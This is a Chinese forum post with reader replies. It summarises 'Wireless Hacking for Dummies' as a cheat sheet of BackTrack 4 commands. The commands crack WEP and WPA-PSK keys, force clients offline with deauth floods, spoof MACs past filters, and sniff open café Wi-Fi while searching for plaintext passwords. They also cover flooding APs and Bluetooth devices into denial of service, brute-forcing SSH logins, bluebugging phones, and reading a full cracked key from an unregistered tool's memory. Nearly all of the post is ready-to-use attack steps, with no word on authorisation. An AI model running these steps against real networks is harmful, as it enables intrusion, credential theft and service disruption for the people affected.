搜索
格西欧解决方案
树熊
查看: 9073|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3715

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
8 @  N9 {, E0 R1 N  g4 @8 ?6 {5 W4 z* H+ _- I5 Q+ N) h# j: x) ~
以下所有操作均在BackTrack 4中进行。
7 b9 Y/ f& G* Z: g% Q' q
  u! K8 t% F( y, P( W( I. r( _1 W
无线WEP加密P解:
; N  F5 }% U/ d' j* p3 u1 U6 q
1 s/ |4 {9 i- ]9 U- {, X6 x注入P解:
8 V6 A2 ~! J& C( I" }: p5 T
" {# L5 E3 ?) |ifconfig
1 u3 T/ |" p8 T: X
( X) k1 N+ g" w5 ~- g7 y. @ifconfig –a! X: c5 ?; D6 ]7 r9 T2 G5 k
# ]% @/ P3 R* N* I
ifconfig wlan0(无线网卡) up% F1 G: u. {' ]
, _' O' @4 R4 D7 U- h5 x- j4 U
airmon-ng start wlan0
8 a$ @. Z' j- h9 `% [2 _: U. B( Z& e# }6 D
airodump-ng mon0
! B6 J/ A/ B6 l  i  u3 s; f- M. p7 P& C, S% a4 p/ x* E; K8 P
airodump-ng --ivs –w ivsfile –c 频道 mon0或+ A1 m  [2 r' }" H. c

- {" J1 T3 O1 @. D" xairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
5 o8 b4 R% J% m) ?9 H" S
. B' u9 m6 |! g, ]1 eaireplay-ng -3 –b BSSID –h Station mon0' S1 v# K: N  {& k* n
# l: v, K$ }, p' r) N2 v2 Z
aircrack-ng ivsfile-01.ivs
8 L: O: o& [2 T+ T
2 A9 }6 b  b+ o0 z: z- N虚连接P解(适用于无客户端连接APP解)! H  J3 u; B' H6 ]1 c- P# K
# x4 b+ d' k) i$ y& ?8 f
ifconfig7 K& g( r: @# z, I7 x
7 r+ A  |3 Y* \( }% t: b& w) f
ifconfig –a
# z7 g& V9 \8 y: i# F: M
/ H6 h- o. Z0 H/ ~( x$ hifconfig wlan0(无线网卡) up7 M0 \6 s: Z& I" G
9 z6 r) ?& ~, p' |! e
airmon-ng start wlan0$ F6 q- b* h* j" ]
* p  r9 Q. |+ c% W0 S/ I; S
airodump-ng mon0
/ M1 h1 t' D' M, v) g  n, [. a: \: o* R+ l/ s" n. I  G, x! a7 b
airodump-ng --ivs –w ivsfile –c 频道 mon0或' u1 Z9 H  |7 m. N, U) {

* y' d+ Y- @) e3 ~. fairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon05 f! D% s$ l) _8 f; l
/ u0 B/ T3 @  m: u" f
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
# P% ^3 j! t, D9 @) S/ p
; d4 l0 t: }: |0 A( v6 O" \$ R+ kaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
1 W/ }* g8 L( T9 [7 y+ L! K1 h
! j: p4 P9 g) ~. o, kaircrack-ng ivsfile-01.ivs+ z* I6 i8 F. P4 \, _3 F2 e. S

! I7 l. a' v  H7 U3 \3 i+ @) T
, {8 i: Z9 M' @2 e: v% V/ ~还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。. n& E, s/ N. }

/ R9 Q4 o. [+ u7 U6 l6 h
; i& ^: }9 @8 o- gWPA-PSKP解7 ?7 J( g' [0 t! K- Q3 }, c& u
) j+ m9 m1 D. n9 R
ifconfig  Z& C7 E% S  b7 k8 Q; |" M  Q

  a" ^4 Q' ]3 E3 c/ v0 qifconfig –a4 l$ b. h7 Z5 ?* m; A( F
! F0 V7 S6 C5 R- ?
ifconfig wlan0(无线网卡) up
6 m6 M( j. A6 I& y- t
, B6 A0 M7 P3 S# e0 X/ c: [airmon-ng start wlan0
( w' k; e( f+ ^! z! P" L+ W
1 ]1 ?! Q6 ?- Hairodump-ng mon0( W3 F! Y5 H2 b$ T. Z5 u! \1 |6 Z9 c

1 t& l) f" I* {airodump-ng –w capfile –c 频道 mon07 q; w# b  c7 w5 H/ W

  l- g8 D% Q  w& N. i" laireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包2 Q( C4 Q0 S( l# c7 Y
  [% l) w. v$ f8 w
aircrack-ng –w Dic capfile-01.cap或
- J' E3 r, }5 b' q8 w7 ]
) p( d' P1 b& A& \cowpatty –f Dic –r capfile-01.cap –s SSID
8 \8 _+ z8 b0 O& d4 P( Z/ e) N  x/ y, L8 ]/ n( V/ t. q
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID+ ?8 [& l, ^8 G" ^& p1 f
/ E  k3 A5 [4 C- R. M8 n
傻瓜式P解软件SpoonWPA。+ N6 I& U( @" F) ^2 _) |+ m1 u

% G7 H4 w3 [- P& |9 YBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst0 G  V& ]7 o; J& \0 u1 m

( g  I1 Z8 [+ @5 p( R
9 @9 H2 F: _: n! f1 @- n" T* N6 k字典文件的生成和上传! k0 O* I0 p6 C* _% e. d

$ H# g& f+ e# j/ s8 H1 j在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
1 i: y$ N) |/ A5 a7 o8 p
! u: Y$ W: y: Q" N4 ~0 ]+ Q$ d( Q7 X/ @0 S
BT4下开启Tftp:Services—TFTPD—start TFTPD
3 w! l2 K: Q1 O0 v+ D' u8 p: R/ J4 B! }! y6 w1 b2 n* L
在Windows的CMD中运行 tftp –i IP put **.dic: `- M; D6 a5 {# f  O

& P) J8 y+ |7 M' k: S1 e; T  @  L( l! @1 a/ e. d6 Z
BT4下开启SSH:Services—SSH—start SSH( ]+ B  g- r/ [' m/ B* J
, a6 ]# k" s& }
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
  _5 M( i7 I8 k! r1 s- b1 O
% j3 v5 Q  g# G* m
3 h* A5 F1 O8 X, D% _/ OAP限制MAC时的解决& ^' }% z. x. B- P' G% @5 G; K
. t) T: F1 |" k% J8 M
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:7 ?$ y2 f7 ^8 w  l0 {

+ f4 E% |8 [  G0 D. N' `# sifconfig wlan0 hw ether NewMAC" G+ q2 D* J3 a9 ?4 u5 K

8 G) V1 R1 Y9 E7 t2 F1 p- N$ D
5 [3 K( j! b! Z6 K关闭SSID广播的AP探测:8 f! P! p4 h& K# Z
2 ]; H* X! n( i" t* Y9 y
1.     Deauth攻击:8 W! S1 C5 v' T, z3 Z
1 M0 y/ X! e+ x. J' A  H% B0 I
airodump-ng mon0" H* p, g' t1 a' h$ c6 \; N
  c; `$ T* R3 D# l( \
aireplay-ng -0 10 –a BSSID –h Station mon0% X1 T8 V/ l: v4 ?6 C" Y3 x5 ?
9 a! l$ T- y3 H. w
2.     抓包分析
8 Y  g5 h3 T3 {# [& n' R/ q0 H6 W# ?
Omnipeek
. f0 O1 J4 u! [1 ^! ~. ~
3 U( h8 ?% K( P' h6 O4 w! ?Tcpdump –n –e –vvv –i 网卡名
) U5 [' u" g% f& o9 D+ i3 R3 z3 T3 d- I, q1 f4 j
3.     暴力P解
" _. h, l0 O0 i/ h1 E0 r! D4 u- h" k; g0 C6 A" B" ^3 G  L
Charon 1.1暴力P解$ t7 X$ z: p7 ]6 s; n% I+ I% [( H

8 i# g( z( b/ ^3 ~2 C& o6 i9 M$ ^( \
/ b8 }& g$ a& g: G+ @无线加密数据包的解密. b0 \4 K. o5 t6 O$ J% Z; M
2 j9 {+ N0 Z2 R$ T
8 g# m2 Q( \8 e# a
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。1 }4 s9 Z. M* U: U6 U
% N4 ]. Z/ U8 h% K& [# C5 U& S& e
FilterNS     DNS解析数据包
  }) m4 [: v0 s1 |- Q; b, [+ X4 e3 L! s
Filter:HTTP    WEB访问数据包
$ R. E$ o) ^: L3 ]5 A- b
/ R9 ?! Y6 B& N+ ?3 QFilter:msnms   MSN
" f; P. Y. Z8 x& G
2 J; d$ S6 A. vCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
* _7 G! `. X& S, @6 M8 I& z  ]! p! u# S) }: H8 c. I. F- Z
使用airdecap-ng解密:% r$ s5 ^8 R0 l. ^

3 G2 i7 v# M) b6 z9 a+ UAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap
4 X! S* o  Y- j( @" t
3 Y9 e: a8 p; S8 e% L+ q+ I' J+ X& s1 y) O! K
咖啡馆中无线数据截取(开放式无加密AP)
/ Z, P4 \; v3 L% L
$ g0 @8 L$ Q$ f; P6 _/ \1.Airodump-ng –w data –c频道 mon0
+ s4 H/ i' L$ L& `0 v9 @, ?0 F/ h, Y8 e% J4 e# r" {* m' C, R0 x
2.使用WireShark打开分析
) Q0 d- G- N4 G& N( D% A& \1 i; g& u$ e; U; f; s
. W$ k. P1 Z, K" V
BT4下的渗透工具:# r  v% Q* F( y5 m% }
9 o5 {# R! R( X9 C  Y+ w5 J
nmap –sP IP/24        判断C段下存活的主机
' a2 S6 |4 B7 t2 F6 \4 E% L- N& s0 ^: M' p/ A( `) d
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
9 `$ t! g2 e- h6 E- T: g
% @  e3 s# n9 lnmap –vv –sV IP –p port   指定端口的详细信息。。。
8 @" P7 L0 a$ e" h
" v+ E# B6 K, h% o6 k! s6 onamp –O IP/24    判断主机的系统版本
& R( H, Y  J  h" W9 d9 _3 B2 {" A  F4 k9 T) }

5 S6 }! D3 q6 S2 N% B. d7 eGUI 版nmap:Zenmap
  P* m" D# C2 `/ m
% n/ h6 b) n/ N- U  L5 W" O" r- H3 w' P
Amap使用:amap –B IP port
2 ?8 @# i8 }- ]
! ]9 q% e0 O$ a' zNbtscan(扫描Windows网络NetBios信息):
/ T4 v: v7 D/ k# S. Z( t  p' H! \, B3 g
nbtscan –v –s : IP/24( T# G. r) b- T% X7 U$ q

8 |# e$ d) z5 A6 K5 Q1 Y5 n/ hnbtscan –r IP
! `- {7 ^( i; i) C, @/ S1 w3 Y' b) a8 S3 B* q; e
# `# H5 U# Q) v0 d
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
1 S* F8 j/ H& L! O& V- v$ c3 A+ q8 s* W+ k9 t2 ]/ j4 J5 r5 U
7 \, a6 I# y- r* n3 b/ k
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
) i" K5 x) o: l. y  \. y, F* a. y
4 D; \0 m. J+ {BruteSSH: ./bruthe.py –h IP –u Username –d Dic
% t* {  N' Q% t* ~/ T; [- `) H5 ]# ^; _: @" g0 i4 c, m5 Y7 d2 {
Metasploit3使用
( @1 i: m3 p, t( r% S; H8 b. g( W无线D.0.S
& v& M  e% m4 L- v1 B
1 X8 R# w6 z6 M# J
: b4 u( {" Z5 ]- q. ?9 ^- {Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)! y$ m4 `+ w( u2 G) ^3 J2 j' K
/ p1 B+ i3 {1 M4 n- i$ `  P! @
airmon-ng start wlan0  s3 r' T( G# G" ]. p0 J

) V7 i2 B' k/ J- U( h9 g9 Mairodump-ng mon0, T0 V% h5 m4 w+ d% s* G' {# f2 i

8 ]0 Q) w% H4 e( z0 N+ W% p, imdk3 mon0 a –a BSSID
; n* q' w* a8 h4 u: R, C% w2 j: H7 d) v# P
对所有的AP攻击:mdk3 mon0 a9 ?  q% A9 M" [4 ?
8 f. v3 b! k" n
4 g0 c) b  N6 K3 H- m* ^
Deauth Flood 攻击1 s+ R0 K. b3 X" U

- x  s; r  R9 W+ P1 F: t' Emdk3 mon0 d –c Channel
, b  p5 R4 T/ S. X6 o
3 ?2 `0 p& K3 D3 n图形化D.O.S攻击:Charon
  S( |& s2 O9 B5 y) W5 M; t, c5 \) k9 a8 x, b

0 C% f0 @  R( E7 }5 G3 M7 v( g当受到攻击时,使用Wireshark抓包可以看到异常信息。
4 U% d/ g) o& e! t
% q. ]! \2 M+ E7 q2 D8 s4 y# ~. S! `
WPA-PSK高速P解
, d' J6 a6 F7 G$ V9 ?
0 I. B! H  q# O  Z& e1.       WPA-PSK PMK Hash TablesP解3 h  G" y- D9 ^

6 C5 I/ a6 f8 X6 L* jCowpatty –d HashTable.hash –r ***.cap –s SSID
+ ^2 b. K9 F7 K& w' |! E: k/ x! H: f( D% ]# i4 [, }. i8 T' y
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
  a4 Q, v" ~" L/ _+ A% g
' j- ]* X7 J6 k# h/ d2.       GPU辅助高速P解, U8 M8 X( ^/ R
6 h1 `0 y- L; P- [
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。9 `- E8 K, O0 ?! d. j4 g
3 ~( @! h, T( P# O
3.       分布式P解
; n, T  U- @; ]( E% I
: i, @( R, K! h' G. k3 ?" q: E: \5 u- V/ D0 L2 G% H: s. n" }
AP的伪造
9 {* V4 @, N5 }; ~
3 _5 k* S) }6 @9 P把AP的MAC改成目标AP的MAC8 l6 ?$ A+ Z3 Y( h
3 Q- g3 ]# f6 `8 Q* E
网卡软AP% \! n& G; `% S, G! W9 J! i. R4 r

; l8 }$ G; _6 _( G5 E6 ?$ r, c) P) V1 j2 C6 S) p3 L% w
伪造大量虚假AP信号:
3 U' ~4 ?- q: k' K7 x7 j
2 ^6 I$ Q7 ^8 U; d) L随机SSID:mdk3 mon0 b –g –c 频道
5 I7 a+ N# B6 S( ~, |- D# M2 @. w9 z1 T0 ?2 u6 h- W
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
' w6 u6 \# r% Q1 {# ]9 Y% k+ p2 g
6 `1 J2 Q9 t% z. Q( e. V
War-Driving
; b7 H5 m5 i1 F* Y1 {5 v# F
) _6 |! C/ Y  c' M- }热点地图绘制
( b& B1 s9 f5 G9 p& ]& d7 r, N5 N, P  }  |
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。: P( D: i/ \( T0 E, }' U- J
( |! {6 R  ^1 J- D/ d% ?

* w% b* P8 H. ^* d# YNetstumble
- M/ b0 R/ \* `5 M! Q2 U) c
1 \8 ?6 _. Y3 O, g9 e
9 D: G* Q' L* N$ T) Q# |/ i( G蓝牙Hacking9 M( F# U3 e/ A4 x! L2 f" s

8 H" Q0 l) Q2 R* T# I- PWindows下的Blue Soleil工具
# q5 ~$ Y7 ]: A+ \$ |! ?% m- i$ ?. i3 s) o  l" H
BT4:3 p+ {, `  L& N8 u1 _

' z) @. `- [) I% ?" }hciconfig 查看蓝牙适配器5 d+ M9 \7 F5 U- Y) Q5 T
) \& z+ A4 u' Z
hciconfig hci0 up 载入蓝牙适配器
! z+ R* t9 Q0 j+ A/ @) S1 `0 y5 \' e8 }' q. N/ f& U; d8 w
hciconfig hci0 class 蓝牙适配器详细信息. k. [" @, `0 V9 B* X! O
2 z5 G; p; E/ ?* X  @

" |( K: J9 h+ e$ q, ~9 V3 Nhcitool(扫描蓝牙). E5 x0 X4 G, F& ]

% G7 B2 K) ~4 C1 v6 Q# k: Ghcitool –i hci0 scan
9 F6 z0 ~) W$ x. R! V0 Z# H0 s4 V2 B; w- W8 d- _9 R" i$ m
BTscanner(扫描蓝牙)
* z$ D" `+ {6 X1 Z1 L/ `6 t; G  b+ M
' W& v+ G% B4 a+ Y, q
蓝牙攻击:
2 }2 m" C, S. h/ z
. J' b( F9 e' fBlueBugging (适用于BlueTooth V1.1的手机)
+ I- q+ Z' |; ^. K
5 e0 p) k9 L' tBluebugger工具:: f& O0 s# p" F9 _
' u: ~/ C2 i+ \/ D0 A  x
Bulebugger –a HD_Addr info) V9 N( c7 K$ w1 P. @1 K3 U4 R

% F9 h; a* w6 e* [) L1 u' o$ c1 v; w5 H7 t
BlueJacking: ^! G4 E, l  c

, ~7 _7 Y( \* o/ K1 `实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
, R0 S/ U8 v* |
+ ]; R6 A' b8 m. `4 |5 D/ C/ h! D* m
HD_Addr修改:
2 u1 I. e4 Q" W$ w/ d9 Q! k: Y! S  Y4 \8 G) t; p
Bdaddr工具" Z. _+ r+ D( y
5 W( o3 w3 m( G
bdaddr –i 蓝牙设备名 新HD_addr, U7 R3 {9 {% ^. c5 q
) c9 Z; m% v; W2 O' Y/ {2 c
! Q" i- D4 H( B) P/ L( u: w& B
蓝牙D.O.S
$ m8 w6 u7 i2 c6 I. ?% _( I  S  v. u3 C) B  s0 ]. H
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
; ^4 O" {+ \+ a+ }( F
) t+ O9 J$ k4 N3 A+ |hciconfig! d6 M3 ~8 \8 p! {8 \# R

! |8 Z, a3 t1 H6 f( o6 @8 t& lhciconfig hci0 up- A/ @# [1 t; I% B* {5 @) o
( l+ e, i& N# X* @' I; v' \! W5 w. @
hcitool –i hci0 scan
6 v9 r2 C4 q# d9 Q/ U" S9 Q9 n
9 f- l( ?$ S! Yl2ping –s 10000 –目标MAC
8 q4 c$ p/ b2 r  Z) H
8 q7 ?) p0 M$ N. v
# @: ^: V9 u5 c$ z6 s不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
( _, N2 m& ^( b0 k
# L, C1 |4 f3 c9 M./fang –r ************-############ -s; C2 A* a- j# p" R
1 K$ I7 Y0 V- B3 {3 z: N
暴力P解************-############的蓝牙设备
( |: x) y1 T0 O9 |& A+ T4 d  j
! y, b5 B  F( D+ s1 m4 r( _# m./fang –l 各厂商BD_Addr分配$ }5 p/ B3 K9 c/ @
  c$ E6 ]: D8 K* I. N

4 @/ i5 O; v. }' WWifiZoo使用
4 C; R& c) g- [  d) P  U2 k
2 D# G. M% I1 c+ E0 b! Z: P./wifizoo.py –c Capfile( u- {: D. c5 b3 s' s- y% K
7 Z+ |! C  h/ s5 M/ c8 E& a
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

710

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。* k8 W5 ~4 |2 O' O
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
; D/ @8 P0 q( f' d3 P呵呵 其实也不贵 21块 快递再一点
1 W) G2 w9 Q1 [, Y& T( |3 W7 u我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2014-12-21 00:27 , Processed in 0.230323 second(s), 13 queries , Gzip On ,Memcache On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表